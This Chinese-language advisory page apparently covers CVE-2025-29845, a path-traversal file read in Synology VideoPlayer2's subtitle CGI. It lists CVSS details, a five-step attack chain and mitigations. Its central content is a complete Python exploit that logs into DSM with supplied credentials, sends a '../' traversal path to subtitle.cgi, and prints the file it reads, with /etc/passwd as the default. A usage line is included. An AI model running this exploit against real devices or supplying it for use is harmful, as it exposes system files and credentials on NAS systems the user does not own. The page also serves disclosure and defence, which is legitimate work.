CVE-2025-29845 Synology VideoPlayer2字幕CGI任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-29845

漏洞类型

任意文件读取

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Synology VideoPlayer2 subtitle cgi (群晖视频播放器)

漏洞概述

CVE-2025-29845是群晖（Synology）VideoPlayer2组件中的一个任意文件读取漏洞。该漏洞存在于字幕CGI处理模块，允许具有低权限的远程认证用户通过构造特殊的请求读取服务器上的.srt字幕文件以及其他任意文件。攻击者可以利用此漏洞读取敏感配置文件、凭据信息或其他系统文件，从而进行进一步的攻击。由于该漏洞无需用户交互即可利用，且攻击复杂度较低，因此对使用受影响版本群晖产品的用户构成中等程度的安全威胁。群晖已于2025年3月发布安全更新修复此漏洞，用户应及时更新系统以消除安全风险。

技术细节

该漏洞存在于Synology VideoPlayer2的字幕处理CGI组件中。漏洞的根本原因在于应用程序对用户输入的文件路径缺乏充分的验证和过滤。攻击者可以通过构造包含路径遍历序列（如../）的请求参数，绕过正常的文件访问限制，读取目标服务器上的任意.srt文件或其他敏感文件。具体来说，当用户上传或指定字幕文件时，后端程序未能正确验证文件路径的合法性，允许攻击者使用相对路径或绝对路径访问系统目录下的文件。攻击者通常需要具备有效的认证凭证（即使是低权限账户）即可发起攻击，成功利用后可读取包括配置文件、密钥文件、用户数据等敏感信息。此类路径遍历漏洞在Web应用安全中较为常见，通常通过输入验证、白名单机制或使用安全的文件访问API可以有效防御。

攻击链分析

STEP 1

步骤1

攻击者扫描目标群晖设备，识别运行VideoPlayer2组件的版本

STEP 2

步骤2

攻击者获取群晖DSM的有效认证凭证（可通过社工、凭证泄露或低权限账户）

STEP 3

步骤3

构造包含路径遍历序列的恶意请求，目标是VideoPlayer2/subtitle.cgi接口

STEP 4

步骤4

发送构造的HTTP GET请求，通过path参数中的../遍历读取目标文件（如/etc/passwd、配置文件等）

STEP 5

步骤5

服务器返回请求的文件内容，攻击者获取敏感信息后可进行进一步攻击（如横向移动、提权等）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-29845 PoC - Synology VideoPlayer2 subtitle CGI Arbitrary File Read
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_cve_2025_29845(target_url, username, password, file_to_read='/etc/passwd'):
    """
    Exploit for CVE-2025-29845: Arbitrary file read via VideoPlayer2 subtitle CGI
    
    Args:
        target_url: Target Synology NAS URL (e.g., https://192.168.1.100)
        username: Valid low-privilege username
        password: Password for the user
        file_to_read: Path to file to read (default: /etc/passwd)
    
    Returns:
        File content if successful, None otherwise
    """
    
    # Step 1: Authenticate to Synology DSM
    login_url = f"{target_url}/webapi/auth.cgi"
    login_params = {
        'api': 'SYNO.API.Auth',
        'method': 'login',
        'version': '6',
        'account': username,
        'passwd': password,
        'session': 'VideoPlayer2',
        'format': 'sid'
    }
    
    print(f"[*] Authenticating to Synology DSM as {username}...")
    try:
        response = requests.get(login_url, params=login_params, verify=False, timeout=10)
        auth_data = response.json()
        
        if auth_data.get('success') != True:
            print("[-] Authentication failed!")
            return None
        
        sid = auth_data['data']['sid']
        print(f"[+] Authentication successful! SID: {sid[:20]}...")
        
    except Exception as e:
        print(f"[-] Error during authentication: {e}")
        return None
    
    # Step 2: Exploit the arbitrary file read via subtitle CGI
    # The vulnerability allows path traversal through the subtitle file parameter
    exploit_url = f"{target_url}/webapi/VideoPlayer2/subtitle.cgi"
    
    # Encode the file path to handle special characters
    # Using path traversal to read arbitrary files
    exploit_params = {
        'api': 'SYNO.VideoPlayer2.Subtitle',
        'method': 'download',
        'version': '1',
        'sid': sid,
        'path': f"../../../../../../..{file_to_read}",
        'format': 'srt'
    }
    
    print(f"[*] Attempting to read file: {file_to_read}")
    print(f"[*] Sending exploit request to {exploit_url}")
    
    try:
        response = requests.get(exploit_url, params=exploit_params, verify=False, timeout=10)
        
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] File read successful! Content length: {len(response.content)} bytes")
            print("=" * 60)
            print(response.text[:2000])  # Print first 2000 chars
            if len(response.text) > 2000:
                print(f"... [Truncated, total {len(response.text)} bytes]")
            print("=" * 60)
            return response.text
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            return None
            
    except Exception as e:
        print(f"[-] Error during exploit: {e}")
        return None
    finally:
        # Logout to clean up session
        logout_url = f"{target_url}/webapi/auth.cgi"
        logout_params = {
            'api': 'SYNO.API.Auth',
            'method': 'logout',
            'version': '6',
            'session': 'VideoPlayer2',
            'sid': sid
        }
        requests.get(logout_url, params=logout_params, verify=False)

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-29845.py <target_url> <username> <password> [file_to_read]")
        print("Example: python cve-2025-29845.py https://192.168.1.100 admin password /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4] if len(sys.argv) > 4 else '/etc/passwd'
    
    exploit_cve_2025_29845(target, user, pwd, file_path)

影响范围

Synology VideoPlayer2 (具体版本需参考群晖官方安全公告)

受影响固件版本请查阅 Synology_SA_25_04 安全公告

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制对群晖管理界面的访问，仅允许授权IP地址访问；2) 禁用不必要的VideoPlayer2功能或服务；3) 监控Web服务器日志，关注异常的路径遍历请求；4) 使用网络防火墙规则限制对相关CGI接口的访问；5) 定期备份重要配置文件和数据；6) 考虑使用VPN或零信任网络架构进行远程访问控制。